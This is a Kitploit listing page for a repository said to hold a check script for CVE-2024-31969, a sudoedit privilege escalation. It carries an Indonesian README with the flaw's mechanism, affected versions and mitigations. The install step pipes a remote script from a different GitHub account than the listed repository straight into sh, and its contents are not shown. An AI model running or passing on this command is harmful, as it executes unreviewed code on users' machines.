Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-31969 — Provides a proof-of-concept check script and documentation for CVE-2024-31969, a local privilege escalation in sudo's sudoedit, including affected versions and mitigation guidance. | Kitploit
Tools/GitHubGitHub/gmh5225/cve-2024-31969
Privilege EscalationVulnerability AnalysisExploitationLearning & EducationCurated Resources
GitHubgmh5225/cve-2024-31969

CVE-2024-31969

Provides a proof-of-concept check script and documentation for CVE-2024-31969, a local privilege escalation in sudo's sudoedit, including affected versions and mitigation guidance.

View Repository
171 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

📌 CVE-2024-31969

CVE-2024-31969 adalah kerentanan local privilege escalation pada sudo ketika menggunakan perintah sudoedit.

Kerentanan ini diperkenalkan sejak sudo 1.9.0 karena cara sudoedit memvalidasi environment variable pengguna dan kepemilikan file yang kurang tepat.


📖 Deskripsi

A flaw introduced in sudo 1.9.0 in how sudoedit validated users' environment variables and file ownership.

Kerentanan ini memungkinkan user lokal dengan akses sudoedit untuk memodifikasi file arbitrary sebagai root melalui manipulasi environment variable seperti SUDO_EDITOR, atau dengan memanfaatkan symlink.


📊 Versi Sudo yang Terdampak:

Versi SudoStatus
1.9.0 → 1.9.15p4🔥 Rentan
1.9.15p5 ke atas✅ Aman
1.8.x (termasuk 1.8.23)❌ Tidak terdampak

📦 Cara Instalasi & Penggunaan

Jalankan perintah berikut:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ Solusi / Mitigasi

  • Update sudo ke versi 1.9.15p5 atau yang lebih baru.
  • Batasi rule sudoers yang memperbolehkan sudoedit untuk user non-root.
  • Gunakan konfigurasi env_keep atau env_reset yang aman dalam file /etc/sudoers.

📚 Referensi

  • CVE-2024-31969 di NVD

⚠️ Disclaimer

Repository ini dibuat untuk tujuan edukasi dan dokumentasi keamanan sistem.
Dilarang keras menggunakan informasi ini untuk aktivitas ilegal atau tanpa izin tertulis dari pemilik sistem.
Segala bentuk penyalahgunaan sepenuhnya di luar tanggung jawab pembuat.

Download Tool